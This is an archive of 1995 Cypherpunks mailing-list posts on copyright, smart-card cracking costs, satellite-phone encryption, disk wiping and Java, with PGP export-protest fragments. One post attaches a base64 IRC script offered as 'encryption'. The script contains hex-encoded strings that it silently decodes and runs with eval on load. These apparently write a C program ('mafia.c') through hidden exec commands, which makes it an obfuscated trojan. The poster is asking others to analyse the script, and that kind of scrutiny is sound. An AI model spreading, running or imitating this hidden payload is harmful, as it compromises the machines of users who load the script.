Message-ID: <m0sbhGO-00004XC@cloud.rain.com>
MIME-Version: 1.0
Content-Type: text/plain


Wolfgang Roeckelein writes:
    >I wasn't aware that you could copyright an algorithm.  Patent,
    >yes, but not copyright.  Intellectual property meens secret,
    >right?  Aren't there any precendence cases involving propriety
    >schemes that are reverse engineered?

    Game cartridges (I think sega was involved)

You might be referring to Nintendo vs. Galoob, which was used as a
sample case in an January 1994 article in the Communications of the
ACM titled "Copyright's Fair use Doctrine and Digital Data".  The
article states

    Nintendo charged Lewis Galoob Toys with contributory copyright
    infringement because Galoob's Game Genie allowed users to alter
    certain aspects of the play of Nintendo video games....
    Nintendo's theory was that Galoob provided consumers with a device
    knowing they would use it to alter the audiovisual sequences of
    the Nintendo games, thereby creating an unauthorized derivative
    work.  Galoob argued fair use in defense.

Nintendo lost the case mostly because Nintendo wasn't going to lose
any money over the device -- after all, you still have to buy the game
cartridge....

As for the quoted material, "Intellectual property meens [sic]
secret" is quite mistaken.  Copyright and patents are the two most
common forms of intellectual property (AFAIK), and neither of them are
secret (unless they're classified patents, but never mind...).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Thu, 27 Jul 95 18:52:32 PDT
To: cypherpunks@toad.com
Subject: cost of attacking cards (fwd)
Message-ID: <9507280146.AA08061@all.net>
MIME-Version: 1.0
Content-Type: text


Forwarded message:
>From fc Thu Jul 27 19:16:26 1995
Subject: cost of attacking cards
To: pgf@tyrell.net (Phil Fraering)
Date: Thu, 27 Jul 1995 19:16:26 -0400 (EDT)
In-Reply-To: <199507272242.AA05163@tyrell.net> from "Phil Fraering" at Jul 27, 95 05:42:57 pm
X-Mailer: ELM [version 2.4 PL22]
Content-Type: text
Content-Length: 608       

> Just wondering, but do you have a cost breakdown for the
> figure of $ 500.00 for a "cash card?" 

I published this stuf about 4 years ago and calculated $5,000, but
a few months ago I spent some time with one of the top people in this
field and he claimed that $500 was the right figure and backed it up
with some experiments.

> Would this be a single-unit manufactured-in-one-piece card
> or something else?

This is based on a volume business where we are breaking cards full time.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236


-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Thu, 27 Jul 95 22:33:27 PDT
To: cypherpunks@toad.com
Subject: Re: Sat phone permit "wire"taps
Message-ID: <ac3dc3af0402100421cb@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:34 AM 7/28/95, John A. Limpert wrote:

>Is there a technical reason why communications through these future
>satellite systems couldn't be encrypted? I thought that all of these
>systems were based on vocoders and digital transmission, just like
>a secure telephone.

There should be no technical reason why voice encryption, or even
end-to-end digital packet encryption, cannot be used. The various satellite
systems (Iridium, Teledesic, Globalstar, etc.) also are targetting laptops,
personal communicators (a la Newton, Envoy, etc.), and thus cannot afford
to screw with the signal in any significant way. (And error correction
codes could easily deal with even fairly massive screwing around with,
should the satcom companies be foolish enough to try to "dither" the
signals....which I doubt they'll ever do.)

The risk is not technical, but legislative.

The government of the U.S. could, for example, mandate to the satcom
companies that only GAK/escrow encryption is permissable...how enforceable
this is echoes the debate we've had for almost three years on such things.

But the McCaw/Microsoft/Motorola/Qualcomm sorts of companies may have to
make token efforts to comply.

I don't expect the crypto banners to win, long run, but I would guess that
right now they are jawboning with the main satellite companies to make
things harder.

The faster systems like "Nautilus" are deployed, the better.

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Thu, 27 Jul 95 22:41:12 PDT
To: Cypherpunks@toad.com
Subject: The Value of "Attachments" on this List
Message-ID: <ac3dc68405021004cc51@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


See attached file: F:\MYFILES\MAY.MSG


The attached file: "MAY.MSG" has been attached in HyperMIME format. It may
be read by any Exidy Sorcerer computer, using Electric Pencil 1.2 (release
date 7-81).







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Thu, 27 Jul 95 22:48:37 PDT
To: cypherpunks@toad.com
Subject: Re: mac share/freeware app for overwriting unused hd space?
Message-ID: <ac3dc7f7060210042380@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:27 PM 7/27/95, j. ercole wrote:
>Can anyone point me towards a program that's freeware or shareware that
>will overwrite all the unused i.e., "trashed" space on my hard drive(s)?  I
>sincerely apologise if this is a faq.  I know norton's will do it but I
>don't presently have that installed on my machine.  Thanks oodles,

Well, getting the commercial products (fairly cheap, for Norton) is the
first line of defense if you're paranoid.

Erasing a file and then filling the disk with other files (even copies of
existing files) will do the same thing, albeit only once.

At the most serious level of attack (the "threat model"), such as the FBI
labs in Quantico or the NSA, there are reports that specialized disk drive
heads are used to recover earlier signals that are not erased even with N
active overwrite steps (apparently the head jitter in most drives means
that each write cycle is slightly different, even on the same disk region,
and a slight "shadow" or "ghost" of previous writes can sometimes be
extracted).

--Tim May, who hopes this will not reignite the thread about how to use
thermite to permanently erase disk drives

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Thu, 27 Jul 95 23:23:31 PDT
To: cypherpunks@toad.com
Subject: Java, Netscape, OpenDoc, and Babel
Message-ID: <ac3dcd76080210046dfa@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



I've been reading up on Java at the Web sites (such as
http://java.sun.com/1.0alpha3/doc/overview/java/index.html) and am awaiting
with bated breath the HotJava browser port for the Mac, to play with.

The "tower of Babel" is getting higher and higher, with Python, TCL,
Safe-TCL, Perl, and the various multimedia languages (Shockwave, Lingo,
ScriptX) all competing for attention.

I guess this is all to the good, and let the best languages and frameworks
prevail.

On a SmalltalkAgents list I am on (I own SmalltalkAgents, a powerful
implementation for the Mac, with a Windows version coming), one poster had
the following to say:

"I am hoping that OpenDoc and specifically CyberDog from Apple provide the
basis for a more rational and open Internet component environment. NetScape
is becoming a kitchen sink app and any solution they create for plug-in
components will set back things when an open industry standard for
components (OpenDoc) is about to be released."

NetScape a kitchen sink? Perhaps, but kitchen sinks have been selling
pretty well for years.

I just picked up a copy of "Pattern Languages of Program Design," edited by
James Coplien (of the well-regarded C++ book) and Douglas Schmidt. This
book has a series of interesting papers on the "design pattern" approach
(as in the book by Erich Gamma et. al.).  The idea behind "pattern
languages," seen by some as the evolution of object-orientation, is to find
architectural abstractions, such as "iterarators" and "constructors" which
encapsulate important behavioral features of a system.

The "applied ontology" in crypto seems to be a natural fit. Or so I think.
Maybe wishful thinking.

But in which framework or language, given the profusion of frameworks and
languages?

We had some TCL advocates a while back (Strick, Hal...)...any reaction to Java?

And so it goes.

--Tim May




..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: johnl@radix.net (John A. Limpert)
Date: Thu, 27 Jul 95 21:35:30 PDT
To: cypherpunks@toad.com
Subject: Re: Sat phone permit "wire"taps
Message-ID: <199507280433.AAA03234@saltmine.radix.net>
MIME-Version: 1.0
Content-Type: text/plain


>  "Officials said government police authorities have expressed concern
>that satellite telephone systems may enable people to conduct
>conversations that are out of the earshot of government investigators. 
>This would be particularly true in an area where, for example, there
>were no gateway through which government investigators could tap into
>calls. 

Is there a technical reason why communications through these future
satellite systems couldn't be encrypted? I thought that all of these
systems were based on vocoders and digital transmission, just like
a secure telephone.

If the future telecommunications infrastructure is digital end to
end, the carriers are going to be transporting streams of bits
at some predetermined rate, not analog voice. Whether the bits are
mu law encoded audio or PGP encrypted pictures of Senator Exon and
his favorite gerbil should be irrelevant to the network.

I wouldn't conduct a sensitive conversation over a wireless or
cellular phone system. Why would the prospective customers of
a satellite based system be satisfied with a system that allows
anyone with the proper equipment to secretly monitor their
conversations? I assume the market for this type of system is
going to be lawyers, business executives and others who are
willing to pay the high rates. Just the sort of people who should
be concerned about the confidentiality of their conversations.

--
John A. Limpert
johnl@Radix.Net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <greg@ideath.goldenbear.com>
Date: Fri, 28 Jul 95 01:57:29 PDT
To: wolfgang@wi.WHU-Koblenz.de
Subject: Re: copyrighting algorithms
In-Reply-To: <199507280808.AA19581@ideath.goldenbear.com>
Message-ID: <199507280816.AA19640@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----


Wolfgang Roeckelein writes:
> No, I was referring to a case, where a third party game cartridges
> manufacturer reverse engineered the specifications of the game
> cartridges slot for producing his own cartridges for this game.

Sounds like _Sega v. Accolade_, 977 F.2d 1510 (9th Cir., 1993). 
I don't have it in front of me, but Terry Carroll's Copyright FAQ
(ftp://rtfm.mit.edu/pub/usenet/news.answers/law/copyright/faq/part2)
cites it for the proposition that dissasembly of a copyrighted work
can be fair use if there is no other way to reach noncopyrightable
(functional, not expressive) elements of an existing work. 


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMBicgX3YhjZY3fMNAQFULwQAgvWmS1+p5BbN/C3wnVl21jqVjTL/tQIN
SMITIXhXTLaNmdGtlnPANC6brOYXb/17d2zHBwR0BcUWiH/AFjBsTLIxwroOx5np
kRSOk7dmw4jifrw4tMJw6Pe/pi7zs+IwT94ToEIKxcXRMs1lPruGdu2HM+kS+4ds
mCF+FKmP89E=
=UDoU
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Thu, 27 Jul 95 22:18:37 PDT
To: rah@shipwright.com (Robert Hettinga)
Subject: Re: Banks and Crypto
Message-ID: <v02130500ac3db15da2d0@hal9001.dialup.access.net>
MIME-Version: 1.0
Content-Type: text/plain


At 08:03 7/27/95, Robert Hettinga wrote:
>At 11:29 PM 7/26/95, Robert A. Rosenberg wrote:
>>At 13:25 7/26/95, KDAGUIO@aba.com wrote:
>>>See attached file: F:\OFFILES\KODMAIL.MSG
>
>>Is there ANY reason why you did not just paste the text of this file into
>>your message?
>
>Cluelessness? Carelessness? Some version of "-lessness", I'm sure...
>
>>Also, if you are going to attach files in lieu of writing
>>messages, it might be useful to mention what Wordprocessor was used to
>>create the file so it can be read. In this case, what format is your file
>>in?
>
>I just used a special feature on my Mac to deal with it. It's called a
>"trash can".
>
>Please remember that almost all such attachments, unless identified (even
>if identified, actually) usually get deleted.
>

I too am a Mac User. I usually pass files like this through MacLink+ first
since it can usually spot what flavor of PC Wordprocessor was used. In this
case, it was unable to accept it as any flavor of WordPerfect PC (which I
assume was the correct designation for the WP Office WP which I assume was
used since the MUA was shown in the Header as WP Office.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (UnCensored Girls Anonymous)
Date: Thu, 27 Jul 95 23:41:29 PDT
To: cypherpunks@toad.com
Subject: Re: The Value of "Attachments" on this List
Message-ID: <199507280641.XAA14433@mailhost.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


TCMay carefully encrypted on July 28th, 1995:
>See attached file: F:\MYFILES\MAY.MSG
>
>The attached file: "MAY.MSG" has been attached in HyperMIME format. It may
>be read by any Exidy Sorcerer computer, using Electric Pencil 1.2 (release
>date 7-81).
>
Not having access to Electric Pencil 1.2, Sharpener 2.7.1 was able to 
"point ot the correct keypoint", and Leadflow 1.6.5 traced the stream 
of bits to determine this vital message:

Have a nice day today!
And,
A nicer tomorrow!

Why thanks Tim!

Love Always,

Carol Anne
ps FV reports others had same problems. Yet 3 days have passed. 
   Shawmut bank only took 9 hours to fix the big 'double charge'
   problem they encountered last weekend.
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wmono@Direct.CA (William Ono)
Date: Fri, 28 Jul 95 02:00:27 PDT
To: cypherpunks@toad.com
Subject: "Encryption" IRC script?
Message-ID: <199507280858.BAA18266@mail.direct.ca>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="Boundary..3931.1071713486.multipart/mixed"

--Boundary..3931.1071713486.multipart/mixed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

C'punks..

I was just DCC'ed this rather cryptic IRCII script.  The author, nickname
george..

/whois george
311 George ~root original.netwest.com * :000-System Admin-000
312 George irc.escape.com :[198.6.71.13] Escape - New York City

(I highly doubt he's really the root there - no identd running?) claims that
it's an encryption routine in IRC.  I don't know how to read that script
language, and I'm most certainly not a crypto expert, so I've attached the
script in hopes that someone can tell me if this guy is a whacko and whatnot.

(Sorry for those not interested - the file was small, so I figured that not
too many people will mind.  It is ASCII with some nonprintables contained
within.)

I warn that I haven't tested the script, and as with all untrusted scripts,
DO NOT RUN IT until it's confirmed by someone that it's safe!


I-CODE.IRC


--
William Ono <wmono@direct.ca>                                     PGP 2902B621
 fingerprint = 51 6B BC 81 57 D8 FF 6A  5A A1 A4 6B 9A E3 E5 EE = fingerprint
PGP-encrypted mail welcome!                              Witty Quote Goes Here


--Boundary..3931.1071713486.multipart/mixed
Content-Type: application/octet-stream; name="bin00001.bin"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bin00001.bin"
Content-Description: ""

IyBJLUNvRGUuU0NSIEJ5IEVQTUQKIwojIEktY29kZSBpcyBhIHB1YmxpYy9w
cml2YXRlIG1lc3NhZ2UgZW5jb2Rlci9kZWNvZGVyIHNjcmlwdCB0aGF0IHVz
ZXMKIyBzdHJpY3QgS0VZIG1hdGNoaW5nIGRlY29kZXJzIHdoZW4gYSBlbmNv
ZGVkIG1lc3NhZ2UgaXMgcmVjZWl2ZWQgdG8KIyBoZWxwIGFnYWluc3QgZmxv
b2RpbmcgYW5kIHBlb3BsZSB0cnlpbmcgdG8gc2ltdWxhdGUgdGhpcyBzY3Jp
cHQuCiMKIyBUaGlzIEVuY29kaW5nIE1ldGhvZCB3YXMgYnJvdWdodCB0byBt
eSBhdHRlbnRpb24gd2hlbiBpIGxvb2tlZCBhdAojIG1vcnNlLmlyYyBhbmQg
cmVhbGl6ZWQgaG93IG11Y2ggYmV0dGVyIGl0IGNvZGUgYmUuCiMKIyBZZXMg
c29tZSBjb2RlIGZvciB0aGlzIHNjcmlwdCBpcyByaXBwZWQgZnJvbSBtb3Jz
ZS5pcmMgOykKIwojIEZVVFVSRSBBRERJVElPTlMgOgojICAvaW1lICAgIDw8
IGVuY29kZWQgYWN0aW9ucwojICAvaXRvcGljIDw8IGVuY29kZWQgdG9waWNz
CiMgIC9raWNrICAgPDwgZW5jb2RlZCBraWNrcwojICBNb3JlIFN0cmljdCBL
ZXkgTWF0Y2ggRGVjb2RlcnMKCl5zZXQgbm92aWNlIG9mZgoKYWxpYXMgaS1l
Y2hvIGVjaG8gXCgCaQJcKSAkMC0KCi9pLWVjaG8gTG9hZGluZyACSS1Db0Rl
AiAodGhpcyBtYXkgdGFrZSBhIG1pbnV0ZSBzbyBiZSBwYXRpZW50KSBCeSBF
UE1ECgphbGlhcyBpaGVscCB7CiAgL2ktZWNobyACSS1Db0RlIEhFTFACIDoK
ICAvaS1lY2hvICAgL2lzYXkgPG1lc3NhZ2U+ICAgICAgICAtIHNlbmRzIGVu
Y29kZWQgbWVzc2FnZSB0byB5b3VyIGN1cnJlbnQgY2hhbm5lbC4KICAvaS1l
Y2hvICAgL2ltc2cgPG5pY2s+IDxtZXNzYWdlPiAtIHNlbmRzIGVuY29kZWQg
bWVzc2FnZSB0byBuaWNrLgp9CgpAIGljb2RlLmtleSA9IFsCaQJdCgpAIGlj
b2RlLm1hdGNoLjEgPSBbRk9HRkhJR0ZHRENBQ05HT0dCR05HRkNBR0lHUEdJ
R1BDQUdER0JIRUNBRE9DQUdOR0JHR0dKR0JDT0dEXQpAIGljb2RlLm1hdGNo
LjIgPSBbRk9ISEdCR0pIRV0KQCBpY29kZS5tYXRjaC4zID0gW0ZPR05IREdI
Q0FDRkdJR1BHSUdQQ0FDREdKR09HREdNSEZHRUdGQ0FETUhBSEhHRUNPR0lE
T10KQCBpY29kZS5tYXRjaC40ID0gW0ZPR05IREdIQ0FDRkdJR1BHSUdQQ0FH
TkdCR0pHT0NJQ0pDQUhMSERIRUhDSEZHREhFQ0FIQUdCSERIREhIR0VDQUNL
SEFETENBSEhHSUdKR01HRkNJSEFETkdIR0ZIRUhBSEhHRkdPSEVDSUNKQ0pD
QUhMSEFIQ0dKR09IRUdHQ0lDQ0NGSERES0NGSERES0NGR0VES0NGR0VES0NG
SERES0NGSERES0NGSERGTUdPQ0NDTUhBQ05ET0hBSEhGUEdPR0JHTkdGQ01I
QUNORE9IQUhIRlBIQUdCSERIREhIR0VDTUhBQ05ET0hBSEhGUEhGR0pHRUNN
SEFDTkRPSEFISEZQR0hHSkdFQ01IQUNORE9IQUhIRlBHSEdGR0RHUEhEQ01I
QUNORE9IQUhIRlBHRUdKSENDTUhBQ05ET0hBSEhGUEhER0lHRkdNR01DSkRM
SE5ITl0KQCBpY29kZS5tYXRjaC41ID0gW0ZPR0ZISUdGR0RDQUNOR0RHTUdQ
SERHRkNBQ0ZHSUdQR0lHUF0KQCBpY29kZS5tYXRjaC42ID0gW0ZPR0ZISUdG
R0RDQUNOR09HQkdOR0ZDQUdER05HRkNBR0hHREdEQ0FDTkdQQ0FHTkdCR0dH
SkdCQ0FHTkdCR0dHSkdCQ09HRF0KQCBpY29kZS5tYXRjaC43ID0gW0ZPSEhH
QkdKSEVDQUNGR0RHTkdGXQpAIGljb2RlLm1hdGNoLjggPSBbRk9HRkhJR0ZH
RENBQ05HT0dCR05HRkNBR0JHT0hFR0pHTENBR05HQkdHR0pHQkNBRE9ET0NB
R05HQkdHR0pHQkNPSEVISUhFXQpAIGljb2RlLm1hdGNoLjkgPSBbRk9ISEdC
R0pIRUNBQ0ZHQkdPSEVHSkdMXQpAIGljb2RlLm1hdGNoLjEwID0gW0ZPR0ZI
SUdGR0RDQUNOR09HQkdOR0ZDQUdCR09IRUdKR05HQkdKR01DQUdOR0JHSkdN
Q0FIQ0dQR1BIRUVBR1BIQ0dKR0hHSkdPR0JHTUNPR09HRkhFSEhHRkhESEVD
T0dER1BHTkNBRE1DQUdOR0JHR0dKR0JDT0hFSElIRV0KQCBpY29kZS5tYXRj
aC4xMSA9IFtGT0hIR0JHSkhFQ0FDRkdCR09IRUdKR05HQkdKR01dCkAgaWNv
ZGUubWF0Y2guMTIgPSBbRk9HRkhJR0ZHRENBSENHTkNBQ05IQ0dHQ0FHTkdC
R0dHSkdCXQpAIGljb2RlLm1hdGNoLjEzID0gW0ZPR0ZISUdGR0RDQUhDR05D
QUNOSENHR0NBR05HQkdHR0pHQkNPR0RdCkAgaWNvZGUubWF0Y2guMTQgPSBb
Rk9HRkhJR0ZHRENBSENHTkNBQ05IQ0dHQ0FHTkdCR0dHSkdCQ09IRUhJSEVd
CkAgaWNvZGUubWF0Y2guMTUgPSBbRk9HQkhESERHSkdIR09DQUNOR05HQkhF
R0RHSUNPR0VHRkdER1BHRUdGRExGT0dCSERIREdKR0hHT0NBR05HQkhFR0RH
SUNPR0VHRkdER1BHRUdGQ0FBQ0dKQUNdCgovaS1lY2hvICAgIAI+PgIgSS1D
b0RlIFN0cmljdCBLZXkgTWF0Y2ggRGVjb2RlcnMgbm93IGxvYWRlZCBpbnRv
IG1lbW9yeS4KQCB0bXBjb3VudCA9IDEKd2hpbGUgKGljb2RlW21hdGNoXVsk
dG1wY291bnRdKSB7CiAgQCBtYXRjaC5kZWNvZGUgPSBbJG1hdGNoLmRlY29k
ZSAkZGVjb2RlKCRpY29kZVttYXRjaF1bJHRtcGNvdW50XSldCiAgLy9ldmFs
ICRkZWNvZGUoJGljb2RlW21hdGNoXVskdG1wY291bnRdKQogIEAgdG1wY291
bnQgPSB0bXBjb3VudCArIDEKfQoKYWxpYXMgbmlja29ubHkge15hc3NpZ24g
RlVOQ1RJT05fUkVUVVJOICRsZWZ0KCRpbmRleCghICQwKSAkMCl9CgpTRVQg
TUFYX1JFQ1VSU0lPTlMgMTAwCkAgbnVsbCA9IFtdCkAgaWNvZGUuY29kZXMg
PSBbXQpAIGljb2RlLmNvZGVzID0gaWNvZGUuY29kZXMgIyMgWwICIB8fIAIC
AgIgHx8fHyACHx8CIB8CAh8gAgICAgICIB8fHx8fHyACHx8fHwIgAh8CAh8C
IAICHx8CAiBdCkAgaWNvZGUuY29kZXMgPSBpY29kZS5jb2RlcyAjIyBbHwIC
AgIfIB8fAgIfHyAfAh8fAh8gAgICAgICAgIgAh8CAgICHwIgAgIfAgIfAgIg
AgICHx8CAgIgHwICAgICAh8gHx8CAgICHx8gHx8fAgIfHx8gXQpAIGljb2Rl
LmNvZGVzID0gaWNvZGUuY29kZXMgIyMgWx8fAgIfHwICIAICAgICAgICAgIg
Ah8CAgICAgIfAiACAh8CAgICHwICIAICAh8CAh8CAgIgAgICAh8fAgICAiAC
Ah8fAgIfHwICIB8CAgICAgICAh8gHx8CAgICAgIfHyAfHx8CAgICHx8fIF0K
QCBpY29kZS5jb2RlcyA9IGljb2RlLmNvZGVzICMjIFsfHx8fAgIfHx8fIB8f
Hx8fHx8fHx8gAgIfHyAfHwICIBYWIBYWFhYgFgICFiACFhYCIBYWAgIgAgIW
FiBdCkAgaWNvZGUuY29kZXMgPSBpY29kZS5jb2RlcyAjIyBbFhYWFhYWIBYW
AgIWFgICIBYCFhYCFiAWFgICFhYgAhYWFhYCIAICFhYCAiAWFhYWFhYWFiAW
AgICAgICFiAWFgICAgIWFiAWFhYCAhYWFiBdCkAgaWNvZGUuY29kZXMgPSBp
Y29kZS5jb2RlcyAjIyBbAhYWFhYWFgIgAgIWFhYWAgIgAgICFhYCAgIgAgIW
FgICFhYgFhYCAhYWAgIgFhYWFgICAgIgAgICAhYWFhYgXQpAIGljb2RlLmlu
ZGV4ID0gaWNvZGUuaW5kZXggIyMgW2EgYiBjIGQgZSBmIGcgaCBpIGogayBs
IG0gbiBvIHAgcSByIHMgdCB1IHYgdyB4IHkgeiBdCkAgaWNvZGUuaW5kZXgg
PSBpY29kZS5pbmRleCAjIyBbMSAyIDMgNCA1IDYgNyA4IDkgMCBdCkAgaWNv
ZGUuaW5kZXggPSBpY29kZS5pbmRleCAjIyBbISBAICMgJCAlIF4gJiAqIC0g
PSArIGAgfiA7IDogJyAiICwgLyA/IFwgfCBdCgpeb24gXnJhd19JcmMgIiUg
UFJJVk1TRyAlIDoqIAJpAiIgewogIGlmIChbJGxlZnQoJDIgMSldPT1bI10p
IHsKICAgIC9pLWVjaG8gAk5pY2sCIDogJG5pY2tvbmx5KCQwKSBbAiQyAl0K
ICB9CiAgeyAvaS1lY2hvIAJOaWNrAiA6ICRuaWNrb25seSgkMCkgWwJNU0cC
XX0KICAvaS1lY2hvIAJEZWNvZGVkAiA6ICR1dGlsLmljb2RldHJhbnMoJHN0
cmlwKDogJDMpICQ0LSkKfQoKYWxpYXMgdXRpbC5pY29kZXRyYW5zIHsKICBp
ZiAoWyRpY29kZS5rZXldPT1bJG1hdGNoLmRlY29kZV0pIHteYXNzaWduIC1t
YXRjaC5kZWNvZGV9CgkjIGNsZWFycyBvbGQgbW9yc2UgY29kZSBsaW5lLi4u
ICYgcmVhc3NpZ25zCglAIGljb2RlY2QgPSBbXQoKCWlmIChbJDFdICE9IFsC
aQJdKSB7IEAgaWNvZGVjZCA9IHV0aWwuaWNvZGV0cmFucygkMS0pIH0KCUAg
bWN0LmNvdW50ID0gMAoJQCBtY3R3ZCA9IFskMF0KCUAgbWN0d29yZCA9IFtd
Cgl3aGlsZSAobWN0LmNvdW50IDwgQG1jdHdkKXsKCQlAIHRlbXBtY3QgPSBb
XQoJCXdoaWxlIChtaWQoJG1jdC5jb3VudCAxICQwKSAhPSBbD10gJiYgbWN0
LmNvdW50IDwgQG1jdHdkKQoJCXsKCQkgIEAgdGVtcG1jdCA9IHRlbXBtY3Qg
IyMgbWlkKCRtY3QuY291bnQgMSAkMCkKCQkgIEAgbWN0LmNvdW50ID0gbWN0
LmNvdW50ICsgMQoJCX0KCgkJQCBtY3RpbmRleCA9IHJtYXRjaCgkdGVtcG1j
dCAkaWNvZGUuY29kZXMpIC0gMQoJCWlmIChtY3RpbmRleCA+PSAwKQoJCXsg
QCBtY3R3b3JkID0gbWN0d29yZCAjIyB3b3JkKCRtY3RpbmRleCAkaWNvZGUu
aW5kZXgpIH0KCQl7CgkJICBpZiAodGVtcG1jdCAhPSBbD10pCgkJCXsgQCBt
Y3R3b3JkID0gbWN0d29yZCAjIyB0ZW1wbWN0IH0KCQl9CgoJCUAgbWN0LmNv
dW50ID0gbWN0LmNvdW50ICsgMQoJfQoJQCBmdW5jdGlvbl9yZXR1cm4gPSBt
Y3R3b3JkICMjIFsgXSAjIyBpY29kZWNkCn0KCmFsaWFzIHV0aWwuaWNvZGVj
b2RlIHsKCSMgY2xlYXJzIG9sZCBtb3JzZSBjb2RlIGxpbmUuLi4gJiByZWFz
c2lnbnMKCUAgaWNvZGVjb2RlID0gW10KCglpZiAoWyQxXSAhPSBbJDEwMDBd
KSB7IEAgaWNvZGVjb2RlID0gdXRpbC5pY29kZWNvZGUoJDEtKSB9CglAIG1j
LmNvdW50ID0gMAoJQCBtY3dkID0gc3RyaXAoFgIfBw8gJDApCglAIG1jd29y
ZCA9IFtdCglAIG1jc2VwID0gW10KCXdoaWxlIChtYy5jb3VudCA8IEBtY3dk
KXsKCQlAIHRlbXBtYyA9IG1pZCgkbWMuY291bnQgMSAkbWN3ZCkKCQlAIG1j
LmNvdW50ID0gbWMuY291bnQgKyAxCgkJQCBtY2luZGV4ID0gcm1hdGNoKCR0
ZW1wbWMgJGljb2RlLmluZGV4KSAtIDEKCQlpZiAobWNpbmRleCA+PSAwKQoJ
CXsKCQkgIEAgbWN3b3JkID0gbWN3b3JkICMjIG1jc2VwICMjIHdvcmQoJG1j
aW5kZXggJGljb2RlLmNvZGVzKQoJCX0KCQl7IAoJCSAgaWYgKHRlbXBtYyAh
PSBbAl0gJiYgdGVtcG1jICE9IFsfXSAmJiB0ZW1wbWMgIT0gWw9dKQoJCQl7
IEAgbWN3b3JkID0gbWN3b3JkICMjIFsPXSAjIyB0ZW1wbWMgfQoJCX0KCQlA
IG1jc2VwID0gWw9dCgl9CglAIGZ1bmN0aW9uX3JldHVybiA9IG1jd29yZCAj
IyBbIF0gIyMgaWNvZGVjb2RlCn0KCmFsaWFzIGlzYXkgey8vc2F5ICR1dGls
Lmljb2RlY29kZSgkMC0pIAJpAn0KYWxpYXMgaW1zZyB7Ly9tc2cgJDAgJHV0
aWwuaWNvZGVjb2RlKCQxLSkgAmkCfQoKL2ktZWNobyAgICACPj4CIExvYWRl
ZCBNQUlOIERlY29kZXIgRU5HSU5FLgoKL2ktZWNobyACSS1Db0RlAiBMT0FE
RUQgKC9paGVscCBmb3IgaGVscCkK
--Boundary..3931.1071713486.multipart/mixed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: merriman@arn.net (David K. Merriman)
Date: Fri, 28 Jul 95 01:27:40 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: Java, Netscape, OpenDoc, and Babel
Message-ID: <199507280834.DAA29882@arnet.arn.net>
MIME-Version: 1.0
Content-Type: text/plain


>
>  Just a quick note to chime in. The OSF just did a deal with Sun
>to port Java to several platforms. The OSF is opening a "web mall"
>where you can grab software objects and run them. 

Still tentative, or is there a Web address?

Dave Merriman
This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th
of the PGP executable. See below for getting YOUR chunk! 
------------------ PGP.ZIP Part [015/713] -------------------
M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8@X'HB_9H#&\X
MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
